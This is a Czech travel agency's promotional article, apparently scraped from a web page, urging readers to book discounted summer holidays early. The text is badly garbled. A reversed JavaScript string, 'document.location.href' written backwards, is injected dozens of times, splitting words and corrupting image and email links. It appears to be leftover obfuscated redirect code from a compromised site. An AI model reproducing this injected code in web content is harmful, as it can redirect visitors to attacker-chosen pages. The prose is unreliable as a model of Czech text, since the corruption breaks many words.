Rainbow page separator

PR: First Minute Dovolená: Ideální čas na výběr dovolené je PRÁVĚ TEĎ!

Pátek, 6. prosince 2019

Zima je pro mnohé z nás každoroční těžkou zkouškou. Během těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to chladných dní se můžete zahřát myšlenkami na slunce, pláž a pohodovou letní dovolenou. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to je přelom roku ideální doba na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, začínat plánovat a nakupovat letní zájezd pro Vás a Vaši rodinu!

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour-dovolena-zdar-nad-sazavou-chorvatsko-sunset-3385999_1920.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour-dovolena-zdar-nad-sazavou-chorvatsko-sunset-3385999_1920.jpg“ alt=““ width=“200″ height=“133″>Na poslední chvíli nechává výběr letní dovolené dnes už málokdo, a není divu. Letenky bývají vyprodané, navíc sehnat zájezd pro rodinu nebo skupinu přátel pár dní předem je skoro nemožné a skoro vždy je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to doprovázeno notnou dávkou stresu. Nejžádanější hotely s ideálním poměrem kvality a ceny mívají navíc plno ještě před začátkem jara. Uvážíme-li ještě navíc, že nejvýhodnější slevy až 50 % za první moment bývají právě nyní, je jasné, že výhodnější chvíle na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to objednat si svou dovolenou snů už nebude. Parkování u letiště zdarma nebo se slevou, drobné dárky, slevy pro věrné zákazníky… A tím výčet výhod zdaleka nekončí! Rodiče mohou do s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek hotelů vyces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat s dětmi zcela zdarma nebo za cenu pouhé letenky, velké skupiny se zase mohou těšit na speciální slevy na míru.

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour-zdar-nad-sazavou-dovolena-chorvatsko-port-4181137_1920.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour-zdar-nad-sazavou-dovolena-chorvatsko-port-4181137_1920.jpg“ alt=““ width=“200″ height=“133″>Doba kolem Vánoc pro mnohé znamená vysoké výdaje na dárky, a u nás pochopitelně myslíme i na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to – zájezdy na lé[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to samozřejmě není nutné platit ihned. Postačí malá záloha a zbytek doplatíte během roku, klidně i přes účet z pohodlí Vašeho domova! Další skvělou možností je i uplatnění slevy Klubu pevného zdraví pojišťovny VZP u vybraných partnerů. Navíc je možné uplatnit i firemní benefity a poukazy (co může být lepšího než představa, že Vám Vaši skvělou letní dovolenou zaplatí Váš šéf?).

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour-dovolena-italie-zdar-nad-sazavou-vernazza-2494779_1920.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour-dovolena-italie-zdar-nad-sazavou-vernazza-2494779_1920.jpg“ alt=““ width=“200″ height=“133″>A pokud by se snad někdo bál, že se mu do léta plány ještě změní a nakonec nebude moct v plánovaném termínu odjet, i pro něj máme řešení – u vybraných zájezdů [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž nabízíme možnost bezplatné změny termínu i místa pobytu ještě týden před odletem!

Nepromeškejte nejvýhodnější slevy a začněte plánovat svou dovolenou co nejdříve, s naší pomocí jistě zažijete nezapomenutelné lé[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, na které budete ještě dlouho vzpomínat!

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour-dovolena-zajezdy-recko-zdar-nad-sazavou-greece-4087377_1920.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour-dovolena-zajezdy-recko-zdar-nad-sazavou-greece-4087377_1920.jpg“ alt=““ width=“200″ height=“133″>Kontaktujte nás na naší infolince 566 624 164, emailu [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to:info@vysocina[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour.cz“>info@vysocina[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour.cz nebo Vás rádi uvidíme osobně v naší kanceláři na Nádražní 10 ve Žďáře nad Sázavou.

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tour.cz/“ target=“_blank“ rel=“noopener“>CA Vysočina Tour – Dovolená šitá na míru za nejlepší možné ceny